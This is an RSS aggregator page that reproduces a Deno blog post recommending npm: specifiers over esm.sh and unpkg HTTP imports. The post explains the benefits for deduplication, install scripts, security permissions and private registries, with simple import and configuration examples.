惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
The Hacker News
The Hacker News
P
Palo Alto Networks Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
T
Tor Project blog
T
Troy Hunt's Blog
Microsoft Azure Blog
Microsoft Azure Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Last Week in AI
Last Week in AI
Hacker News - Newest:
Hacker News - Newest: "LLM"
D
Docker
博客园 - 三生石上(FineUI控件)
量子位
腾讯CDC
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Cyberwarzone
Cyberwarzone
博客园 - 【当耐特】
Recent Announcements
Recent Announcements
M
MIT News - Artificial intelligence
Recorded Future
Recorded Future
G
GRAHAM CLULEY
P
Privacy & Cybersecurity Law Blog
T
Threat Research - Cisco Blogs
GbyAI
GbyAI
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Google DeepMind News
Google DeepMind News
Simon Willison's Weblog
Simon Willison's Weblog
Cloudbric
Cloudbric
Project Zero
Project Zero
SecWiki News
SecWiki News
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
W
WeLiveSecurity
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Latest news
Latest news
Schneier on Security
Schneier on Security
小众软件
小众软件
U
Unit 42
Y
Y Combinator Blog
Help Net Security
Help Net Security
Vercel News
Vercel News
月光博客
月光博客
WordPress大学
WordPress大学
C
CERT Recently Published Vulnerability Notes
Google Online Security Blog
Google Online Security Blog
T
Tenable Blog
C
Check Point Blog
MongoDB | Blog
MongoDB | Blog
N
Netflix TechBlog - Medium
Blog — PlanetScale
Blog — PlanetScale

Deno

Deno 2.8 | Deno Claw Patrol: an open-source security firewall for agents | Deno Fresh 2.3: Zero JS by default, View Transitions, and Temporal support | Deno Deno 2.7: Temporal API, Windows ARM, and npm overrides | Deno Build a dinosaur runner game with Deno, pt. 6 | Deno Build a dinosaur runner game with Deno, pt. 5 | Deno Deno Deploy is Generally Available | Deno Introducing Deno Sandbox | Deno Build a dinosaur runner game with Deno, pt. 4 | Deno Build a dinosaur runner game with Deno, pt. 3 | Deno Build a dinosaur runner game with Deno, pt. 2 | Deno React / Next.js Denial-of-Service Vulnerability: Deno Deploy users protected | Deno Deno 2.6: dx is the new npx | Deno Build a dinosaur runner game with Deno, pt. 1 | Deno React Server Functions / Next.js Vulnerability: Deno Deploy users protected | Deno My highlights from the new Deno Deploy | Deno Deno's Other Open Source Projects | Deno How Deno protects against npm exploits | Deno Help Us Raise $200k to Free JavaScript from Oracle | Deno Deno 2.5: Permissions in the config file | Deno Fresh 2.0 Graduates to Beta, Adds Vite Support | Deno Deno 2.4: deno bundle is back | Deno JavaScript™ Trademark Update | Deno What's coming to JavaScript | Deno A brief history of JavaScript | Deno Reports of Deno's Demise Have Been Greatly Exaggerated | Deno An Update on Fresh | Deno How Plaid migrated 100 services to a new database platform 5x faster with Deno | Deno Deno 2.3: Improved deno compile, local npm packages, and more | Deno Add JSR packages with pnpm and Yarn | Deno Zero-config Debugging with Deno and OpenTelemetry | Deno Exploring Art with TypeScript, Jupyter, Polars, and Observable Plot | Deno Deno v Oracle Update 3: Fighting the JavaScript Trademark | Deno Build a custom RAG AI agent in TypeScript and Jupyter | Deno How to get deep traces in your Node.js backend with OTel and Deno | Deno toranoana.deno #20 登録受付中(2025年3月14日) | Deno Node just added TypeScript support. What does that mean for Deno? | Deno The Dino 🦕, the Llama 🦙, and the Whale 🐋 | Deno Publish a lint rule, get a prize | Deno Deno 2.2: OpenTelemetry, Lint Plugins, node:sqlite | Deno How Deno's documentation is evolving | Deno Oracle justified its JavaScript trademark with Node.js—now it wants that ignored | Deno Introducing the JSR open governance board | Deno Intro to Wasm in Deno | Deno Announcing OpenAI on JSR | Deno Deno in 2024 | Deno Goodbye WinterCG, welcome WinterTC | Deno Build a SolidJS app with Deno | Deno Run your Next.js SSR app on Deno Deploy | Deno Solve Advent of Code 2024 with Deno and Win Prizes! | Deno Deno v. Oracle: Canceling the JavaScript Trademark | Deno Deno 2.1: Wasm Imports and other enhancements | Deno Build a Typesafe API with tRPC and Deno | Deno Self-contained Executable Programs with Deno Compile | Deno Build a Database App with Drizzle ORM and Deno | Deno Introducing your new JavaScript package manager: Deno | Deno Announcing Growthbook on JSR | Deno Build an Astro site with Deno | Deno How to convert CommonJS to ESM | Deno Announcing Deno 2 | Deno The Final Touches: What’s New In v2.0.0-rc.10 | Deno Announcing Stable V8 Bindings for Rust | Deno Deno 2.0 Release Candidate | Deno Secure, efficient private npm registries with Cloudsmith and Deno | Deno Painting the Plane as We Fly It: Designing JSR | Deno Introducing Web Cache API support on Deno Deploy | Deno Deno 1.46: The Last 1.x Release | Deno Protect your cloud spend with new Deno Deploy spend limits | Deno What we got wrong about HTTP imports | Deno Benchmarking AWS Lambda Cold Starts Across JavaScript Runtimes | Deno Announcing Supabase on JSR | Deno Deno 1.45: Workspace and Monorepo Support | Deno Introducing KV Backup for Deno Subhosting | Deno A Gentle Intro to TypeScript | Deno Announcing Hono on JSR | Deno How We Made the Deno Language Server Ten Times Faster | Deno How the Guardian uses Deno to audit accessibility and performance across their 2.7 million articles | Deno Introducing More Flexible Domain Association for Deno Subhosting | Deno The stabilization process of the Standard Library has begun | Deno Deno 1.44: Private npm registries, improved Node.js compat, and performance boosts | Deno How we built a secure, performant, multi-tenant cloud platform to run untrusted code | Deno The Deno Standard Library is now available on JSR | Deno How to document your JavaScript package | Deno Your Low Code Solution Needs an Escape Hatch | Deno Deno 1.43: Improved Language Server performance | Deno How Slack used Deno to save months of engineering effort in launching their new platform | Deno JSR Is Not Another Package Manager | Deno Announcing the Hookdeck SDK on JSR | Deno Announcing the Neon Serverless Driver on JSR | Deno An intro to TSConfig for JavaScript Developers | Deno How we built JSR | Deno How Netlify used Deno Subhosting to build a successful edge functions product | Deno Introducing Simpler Project Creation in Deno Deploy | Deno Deno 1.42: Better dependency management with JSR | Deno Introducing deployctl, the command line interface for Deno Deploy | Deno Introducing JSR - the JavaScript Registry | Deno How to add Monaco to a Next.js app and securely run untrusted user code | Deno Survey Results and Roadmap | Deno Deno 1.41: smaller deno compile binaries | Deno Webhooks suck, but here are alternatives | Deno
If you're not using npm specifiers, you're doing it wrong | Deno
Andy Jiang · 2025-02-13 · via Deno

During the early days of Deno, we recommended importing npm packages via HTTP with transpile services such as esm.sh and unpkg.com. However, there are limitations to importing npm packages this way, such as lack of install hooks, duplicate dependency resolution issues, loading data files, etc. That’s why after native npm support was added with the release of Deno 2, we recommend using npm: specifiers directly.


import React from "https://esm.sh/react@19";


import React from "npm:react@19";

In this blog post, we’ll cover the limitations from using npm via these transpile services, as well as all the benefits to natively importing npm packages:

  • Limitations of hosted transpile services
    • Duplicate dependency issues
    • No install hooks and native add-ons
    • No data files
  • Benefits of natively importing npm packages
    • No node_modules
    • No package.json
    • Jupyter notebooks and REPL
    • Improved security
    • Private npm registries
  • What’s next

🚨️ Try Deno 2 today. 🚨️

Deno offers backwards compatibilty with Node/npm, built-in package management, all-in-one zero-config toolchain, native TypeScript support, and more.

Limitations of hosted transpile services

Duplicate dependency issues

When you import https://esm.sh/react and https://esm.sh/react-dom, the latter dependency might import a duplicate react version:

import react from "https://esm.sh/react";
import reactDom from "https://esm.sh/react-dom";

And while there are some ways to manage this via special esm.sh URL flags, they can be tedious and fiddly. Importing from esm.sh lacks semantic versioning, making it hard to dedup dependencies.

Conversely, importing from npm natively via npm: specifiers allows Deno to understand semantic versions of your dependencies. This is just like using npm with Node and will work as expected. This means smaller module graph and smaller number of loaded modules.

No install hooks and native add-ons

Some npm packages require native add-ons to be compiled at install time. When importing natively with npm, install hooks will run an install script that calls node-gyp to build the add-on.

Unfortunately, there are no install hooks when importing npm packages via HTTP, so some of these npm packages that require a separate install step can not be fully installed.

Deno’s native npm support allows install hooks to run with the --allow-scripts flag:

deno install --allow-scripts=npm:duckdb

No data files

Certain npm packages ship with non-JavaScript files, such as text files, csv, json, etc., which it will load at runtime. However, these transpile services are unable to serve a compatible version, which results in unusual errors and an overall subpar developer experience.

Importing npm packages natively in Deno is the same as importing in Node — data files are downloaded and can be accessed from the module at runtime, which is the expected behavior.

Benefits of natively importing npm packages

No node_modules

Programming is a battle against complexity. Any superfluous code, config, folders, processes, etc. can divert focus and mindshare from critical business logic. This is why Deno is zero config (with sane defaults) and has a complete built-in toolchain so you can dive right into writing code.

You can use npm: specifiers with Deno to install npm packages without needing to create a node_modules folder in your directory. This is beacuse Deno will then install your npm package to your global cache:

No node_modules folder

You can even use npm: specifiers in your deno.json :

No node_modules folder

Note that if you have a package.json present, Deno will automatically default to creating a node_modules folder, as many npm packages expect and require it. However, you can control whether a node_modules is created with the nodeModulesDir attribute in your deno.json .

No package.json

Sometimes you want to write a simple JavaScript or TypeScript program, and run it and share it without extra code or steps.

In Node, package.json is the dependency manifest, and is necessary to accompany your program if you have any dependencies. If you were to share your program with someone else, they would need the package.json, as well as use an extra step to install these dependencies, before they can run your program.

In Deno, you can inline npm: specifiers in your import statement (as well as package versions) so you don’t need package.json at all. You can share your code by sharing your JS or TS file. If someone else runs it with Deno, Deno will automatically download the correct dependencies, and your program will run the same way as it did on your machine. Fewer files, steps, and frustrations.

In fact, treating single file scripts without dependency manifests as “immutable scripts” can lead to creating ecosystems of composable programs.

Windmill.dev example with immutable scripts

Windmill.dev uses Deno’s optional dependency manifest to create immutable scripts, a foundational building block for their user-generated workflows.

Of course, you can always use package.json in cases where your dependencies might require one.

Importing npm and jsr packages is recommended in any Deno program — CLI, servers, libraries, etc. — even in other contexts where Deno is used, such as Jupyter notebooks and REPL. Let’s take a look at that next.

Jupyter notebooks and REPL

Deno’s jupyter support is great for exploring datasets in JavaScript/TypeScript, or even to use as a REPL (though you can use deno repl as well — more below).

You can use npm: directly in Jupyter notebooks so you can import key npm modules for data exploration, analysis, and even charting. Here’s an example of using npm:polars in Jupyter notebooks:

Jupyter notebooks with Deno

Working with data sets in JavaScript and TypeScript not only has many data libraries that is available in Python, but also allows you to easily render your analysis to HTML. Here’s an example using npm:@observablehq/plot:

Rendering HTML chart with JavaScript in Deno

Rendering an HTML chart with JavaScript via npm:@observablehq/plot and jsr:@ry/jupyter-helper.

Interested in using JS/TS to explore datasets in Deno jupyter? Here are some awesome libraries (and their Python counterparts) to help get you started:

You can also use npm: in your deno repl:

Importing npm packages in Deno repl

Note that just like any other Deno program, both Jupyter notebooks and REPL make use of your global cache for dependencies. That not only means less vendor clutter in your directories, but also faster execution once your dependencies are cached.

Improved security

In Node, when you import an npm module, that module has unfettered access to everything. And due to the hyper composability of npm modules, there have been dozens of reported security vulnerabilities from malicious npm modules that have stolen user data from forms, performed shell injection attacks, installed malware onto your machine, and more.

Deno, designed with security in mind from the outset, uses an opt-in-permissions model that will alert you when any of your dependencies are requesting access to anything sensitive. For instance, npm:chalk requires access to several environment variables:

On top of having an additional security layer with Deno’s permission system, Deno also requires you to opt into allowing pre- and post- install scripts during the npm install process. While certain npm packages require these lifecycle install scripts to run properly, they also have full access to your systems. This means essentially allowing the package author to run any scripts on your machine, CI environment, etc., which is dangerous if you don’t recognize what packages are being installed.

In Deno, if you install an npm package that requires a lifecycle install script to execute, you’ll be prompted with the following warning message:

Permission prompt for lifecycle install scripts during npm install

To enable install scripts, you can use the --allow-scripts flag. Note that this flag can also accept parameters for specific package names, giving you not only more visibility, but also more granular control.

Private npm registries

Many large organizations host their own private npm registries to manage internal packages. Deno supports this in the same way Node does — with an .npmrc file to configure Deno to fetch packages from this private registry:

// .npmrc
@mycompany:registry=http://mycompany.com:8111/
//mycompany.com:8111/:_auth=secretToken

{
  "imports": {
    "@mycompany/package": "npm:@mycompany/package@1.0.0"
  }
}

import { hello } from "@mycompany/package";

console.log(hello());
$ deno run main.ts
Hello world!

You can also use private npm packages in your package.json file:

// package.json
{
  "dependencies": {
    "@mycompany/package": "1.0.0"
  }
}

import { hello } from "@mycompany/package";

console.log(hello());
$ deno run main.ts
Hello world!

What’s next

While Deno will always offer HTTP imports due to its web native protocol, we recommend defaulting to using npm: or jsr: specifiers for Deno 2 and above.

To learn more about what npm packages and frameworks you can use with Deno 2, check out our tutorials:

此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。